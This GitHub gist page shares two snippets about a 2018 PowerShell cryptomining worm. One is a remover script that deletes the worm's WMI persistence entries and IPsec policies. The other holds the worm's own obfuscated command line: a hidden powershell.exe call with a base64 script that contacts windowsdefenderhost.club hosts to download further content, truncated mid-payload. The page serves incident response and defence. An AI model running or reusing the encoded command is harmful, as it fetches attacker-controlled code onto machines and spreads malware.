Skip to content

Instantly share code, notes, and snippets.

Avatar

Gal Abadi galabadi

View GitHub Profile
@galabadi
galabadi / CryptoWorm-remover.ps1
Created May 23, 2018
CryptoWorm remover script
View CryptoWorm-remover.ps1
Get-WmiObject CommandLineEventConsumer -namespace root\subscription | Where-Object {$_.Name -match ('SCM Event Consumer')} | Select-Object -first 1 | Remove-WmiObject
Get-WmiObject __EventFilter -namespace root\subscription | Where-Object {$_.Name -match ('SCM Event Filter')} | Select-Object -first 1 | Remove-WmiObject
netsh.exe ipsec static delete policy name=netbc
netsh.exe ipsec static delete filteraction name=block
netsh.exe ipsec static delete filterlist name=block
@galabadi
galabadi / Powershell crypto worm commandlines
Created May 23, 2018
Powershell crypto worm commandlines
View Powershell crypto worm commandlines
powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwAxADkANQAuADIAMgAuADEAMgA3AC4AOQAzACcALAAnAHUAcABkAGEAdABlAC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbAB1AGIAJwAsACcAaQBuAGYAbwAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcAKQAKACQAbgBpAGMAPQAnAHcAdwB3AC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbAB1AGIAJwAKAGYAbwByAGUAYQBjAGgAKAAkAHQAIABpAG4AIAAkAHMAZQApAAoAewAKACAAIAAgACAAJABwAGkAbgA9AHQAZQBzAHQALQBjAG8AbgBuAGUAYwB0AGkAbwBuACAAJAB0AAoACgAgACAAIAAgAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAAKACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsACgAgACAAIAAgAH0ACgB9AAoAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQAgAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAAoAIAAgACAAIABpAGYAKAAkAHY
You can’t perform that action at this time.